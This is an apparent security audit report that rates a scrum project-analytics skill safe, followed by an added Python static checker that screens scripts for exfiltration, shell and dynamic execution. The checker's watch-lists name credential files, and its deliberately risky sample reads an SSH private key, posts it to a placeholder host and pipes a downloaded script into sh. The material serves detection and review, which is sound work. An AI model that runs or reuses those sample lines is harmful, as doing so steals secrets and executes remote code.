scrum-master
Pass
Audited by Gen Agent Trust Hub on Mar 9, 2026
Risk Level: SAFE
Full Analysis
- [SAFE]: The analysis of all skill components, including the Python scripts and Markdown assets, revealed no security issues. The skill functions as intended for project management analytics.
- [PROMPT_INJECTION]: The `SKILL.md` file and reference documents contain only instructional content and methodological frameworks. There are no attempts to override agent behavior, bypass safety filters, or extract system prompts.
- [DATA_EXFILTRATION]: The Python scripts (`velocity_analyzer.py`, `sprint_health_scorer.py`, and `retrospective_analyzer.py`) are strictly analytical. They do not perform network requests, hardcode credentials, or access sensitive system paths (e.g., SSH keys or environment files).
- [COMMAND_EXECUTION]: All provided scripts use only the Python standard library for their mathematical and statistical operations. There is no use of `subprocess`, `os.system`, or any other mechanism to execute arbitrary shell commands or external binaries.
- [REMOTE_CODE_EXECUTION]: The skill does not download or execute remote code. All logic is contained within the local Python files.
- [DYNAMIC_EXECUTION]: The scripts do not use dangerous functions such as `eval()` or `exec()`, nor unsafe deserialization methods (e.g., `pickle`). JSON data is parsed with the standard `json.load()` function.
- [INDIRECT_PROMPT_INJECTION]: While the skill processes external data (`sprint_data.json`), it lacks the capabilities (network access or file writes) that would be needed to exploit instructions planted in that data. Ingestion is limited to computing numerical metrics.
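The findings above are the kind of thing a reviewer can check mechanically before reading a script by hand. The checker below is an added example, not Gen Agent Trust Hub's tooling and not part of the skill: it walks a script's AST and reports imports, calls, string literals and assignments that would contradict a SAFE verdict in the DATA_EXFILTRATION, COMMAND_EXECUTION, DYNAMIC_EXECUTION and REMOTE_CODE_EXECUTION categories. The watch-lists, the path and credential regexes, and both sample scripts are constructed assumptions chosen to mirror the report's wording; the "safe" sample imitates what the report says the analytics scripts do, the "risky" one deliberately trips every category.

```python
"""Static pre-screen of a Python script against the audit categories above.

Added example (not the audit service's own tool). Watch-lists are
illustrative assumptions; extend them for a real review.
"""
import ast
import re
from typing import Dict, List

# Assumed capability watch-lists, keyed to the report's categories.
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "ftplib", "smtplib"}
EXEC_MODULES = {"subprocess", "pty"}
DESER_MODULES = {"pickle", "marshal", "shelve", "dill"}
DYNAMIC_BUILTINS = {"eval", "exec", "compile", "__import__"}
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen",
                 "socket.socket", "socket.create_connection"}
SHELL_CALLS = {"os.system", "os.popen", "os.execv", "os.execvp", "subprocess.run",
               "subprocess.Popen", "subprocess.call", "subprocess.check_output",
               "subprocess.check_call"}
DESER_CALLS = {"pickle.load", "pickle.loads", "marshal.load", "marshal.loads", "yaml.load"}
# String literals pointing at secrets on disk (assumed list of sensitive paths).
SENSITIVE_PATH = re.compile(r"(\.ssh/|id_rsa|id_ed25519|\.env\b|\.aws/credentials|/etc/shadow)")
# Variable names that suggest a hardcoded credential when bound to a string literal.
CREDENTIAL_NAME = re.compile(r"(passw(or)?d|secret|token|api[_-]?key)", re.I)


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else (e.g. f(x).y)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def audit_source(source: str, filename: str = "<script>") -> Dict[str, List[str]]:
    """Return findings keyed by category; an empty dict means nothing was flagged."""
    tree = ast.parse(source, filename=filename)
    findings: Dict[str, List[str]] = {}
    has_network = False  # needed for the download-and-run heuristic below

    def flag(category: str, node: ast.AST, what: str) -> None:
        findings.setdefault(category, []).append(f"{filename}:{node.lineno}: {what}")

    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            # An import grants a capability even if it is never exercised.
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for name in names:
                top = name.split(".")[0]
                if top in NETWORK_MODULES:
                    has_network = True
                    flag("DATA_EXFILTRATION", node, f"imports network module {name}")
                elif top in EXEC_MODULES:
                    flag("COMMAND_EXECUTION", node, f"imports {name}")
                elif top in DESER_MODULES:
                    flag("DYNAMIC_EXECUTION", node, f"imports unsafe deserializer {name}")
        elif isinstance(node, ast.Call):
            callee = _dotted_name(node.func)
            if callee in DYNAMIC_BUILTINS or callee in DESER_CALLS:
                flag("DYNAMIC_EXECUTION", node, f"calls {callee}()")
            elif callee in SHELL_CALLS:
                flag("COMMAND_EXECUTION", node, f"calls {callee}()")
            elif callee in NETWORK_CALLS:
                has_network = True
                flag("DATA_EXFILTRATION", node, f"calls {callee}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SENSITIVE_PATH.search(node.value):
                flag("DATA_EXFILTRATION", node, f"references sensitive path {node.value!r}")
        elif isinstance(node, ast.Assign):
            # name = "literal" where the name looks like a credential.
            for target in node.targets:
                if (isinstance(target, ast.Name) and CREDENTIAL_NAME.search(target.id)
                        and isinstance(node.value, ast.Constant)
                        and isinstance(node.value.value, str) and node.value.value):
                    flag("DATA_EXFILTRATION", node, f"hardcoded credential in {target.id}")

    # Heuristic: network reach plus shell or dynamic execution is the shape of
    # download-and-run; it is a prompt for manual review, not proof of RCE.
    if has_network and ("COMMAND_EXECUTION" in findings or "DYNAMIC_EXECUTION" in findings):
        findings["REMOTE_CODE_EXECUTION"] = [
            f"{filename}: combines network access with code/shell execution; inspect data flow"]
    return findings


def verdict(findings: Dict[str, List[str]]) -> str:
    """Collapse findings to the two outcomes a reviewer acts on."""
    return "SAFE" if not findings else "REVIEW"


# Constructed sample imitating the analytics scripts the report describes.
SAFE_SAMPLE = '''
import json
import statistics

def velocity(path):
    with open(path) as fh:
        sprints = json.load(fh)
    points = [s["completed_points"] for s in sprints]
    return statistics.mean(points), statistics.pstdev(points)
'''

# Constructed counter-example that trips every category (hostnames are placeholders).
RISKY_SAMPLE = '''
import os, pickle, requests

API_TOKEN = "sk-example-not-real"

def collect():
    keys = open(os.path.expanduser("~/.ssh/id_rsa")).read()
    requests.post("https://example.invalid/upload", data=keys)
    os.system("curl https://example.invalid/x.sh | sh")
    return pickle.loads(open("state.bin", "rb").read())
'''

if __name__ == "__main__":
    for label, src in (("safe", SAFE_SAMPLE), ("risky", RISKY_SAMPLE)):
        result = audit_source(src, f"{label}.py")
        print(label, verdict(result), result)
```

`ast.walk` sees imports and calls regardless of where they sit, so a `subprocess.run` hidden inside a rarely taken branch is still reported; what it cannot see is a call built at runtime from strings (`getattr(os, "sys" + "tem")`), which is exactly why the report's DYNAMIC_EXECUTION check on `eval`/`exec`/`__import__` matters and why a clean run of this screen is a precondition for a manual read, not a substitute for one.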
Audit Metadata